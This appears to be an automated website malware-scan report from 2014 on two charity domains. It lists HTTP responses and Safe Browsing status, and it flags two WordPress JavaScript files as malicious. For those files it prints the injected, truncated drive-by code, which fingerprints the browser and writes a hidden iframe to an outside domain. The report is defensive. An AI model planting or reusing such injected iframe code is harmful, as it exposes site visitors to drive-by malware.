Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=growingwithoutborders.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: campobasso-imprese.it
Result:
GET / HTTP/1.1
Host: campobasso-imprese.it
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: campobasso-imprese.it
Referer: http://www.google.com/search?q=campobasso-imprese.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: campobasso-imprese.it
Referer: http://www.google.com/search?q=campobasso-imprese.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://growingwithoutborders.org/ | HTTP/1.1 302 Found Cache-Control: max-age=3600 Connection: close Date: Wed, 17 Sep 2014 21:03:26 GMT Accept-Ranges: bytes Age: 0 Location: http://growingwithoutborders.org/index.html Server: Apache/2 Content-Length: 227 Content-Type: text/html; charset=iso-8859-1 Expires: Wed, 17 Sep 2014 22:03:26 GMT | clean |
http://growingwithoutborders.org/index.html | HTTP/1.1 200 OK Cache-Control: max-age=3600 Connection: close Date: Wed, 17 Sep 2014 21:03:26 GMT Accept-Ranges: bytes Age: 0 ETag: "6e-4a8625d4be32c" Server: Apache/2 Content-Length: 110 Content-Type: text/html Expires: Wed, 17 Sep 2014 22:03:26 GMT Last-Modified: Tue, 19 Jul 2011 01:52:12 GMT | malicious |
http://www.grandirsansfrontieres.org/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 17 Sep 2014 21:03:28 GMT Pragma: no-cache Location: http://grandirsansfrontieres.org/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=565a710beb1a6b8667ea89ee20c9cf6f; path=/ Set-Cookie: SimpleEcommCartSID=RNNME6BG4B62JKXS2FFVPV5TY38Y2A8O6N14T4IJ; path=/ X-Pingback: http://grandirsansfrontieres.org/xmlrpc.php X-Powered-By: PHP/5.4.31 | clean |
http://grandirsansfrontieres.org/ | 200 OK Content-Length: 27655 Content-Type: text/html | clean |
http://grandirsansfrontieres.org/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 97455 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8253 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://bubneriod.ryko89.com/brubigaler16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border- Antivirus reports:
| ||
http://grandirsansfrontieres.org/wp-content/plugins/easy-social-icons/js/cnss.js?ver=1.0 | 200 OK Content-Length: 1342 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/plugins/sz-video/players/flowplayer/flowplayer.min.js?ver=5.4.3 | 200 OK Content-Length: 35246 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/plugins/simple-e-commerce-shopping-cart/js/simpleecommcart-library.js?ver=1.0.0 | 200 OK Content-Length: 1810 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/themes/wpaid/scripts/prettyphoto.js | 200 OK Content-Length: 23424 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/themes/wpaid/scripts/easing.js | 200 OK Content-Length: 7512 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/themes/wpaid/scripts/parallax.js | 200 OK Content-Length: 6974 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/themes/wpaid/scripts/bxslider.js | 200 OK Content-Length: 20176 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/themes/wpaid/scripts/cookie.js | 200 OK Content-Length: 2892 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/themes/wpaid/scripts/respond.js | 200 OK Content-Length: 4268 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/themes/wpaid/scripts/retina.js | 200 OK Content-Length: 2379 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/themes/wpaid/scripts/custom.js | 200 OK Content-Length: 5425 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://bubneriod.ryko89.com/brubigaler16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border- menuContainer.css('backgroundColor', '#9e0909'); sliderBorder.css('borderColor','#9e0909'); colorSelectors.css('color','#9e0909'); return false; }); jQuery('.darkOption a').css({color:"#363636"}).click(function () { menuContainer.css('backgroundColor', '#363636'); sliderBorder.css('borderColor','#363636'); colorSelectors.css('color','#363636'); return false; }); } Antivirus reports:
| ||
http://grandirsansfrontieres.org/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4 | 200 OK Content-Length: 5342 Content-Type: application/javascript | clean |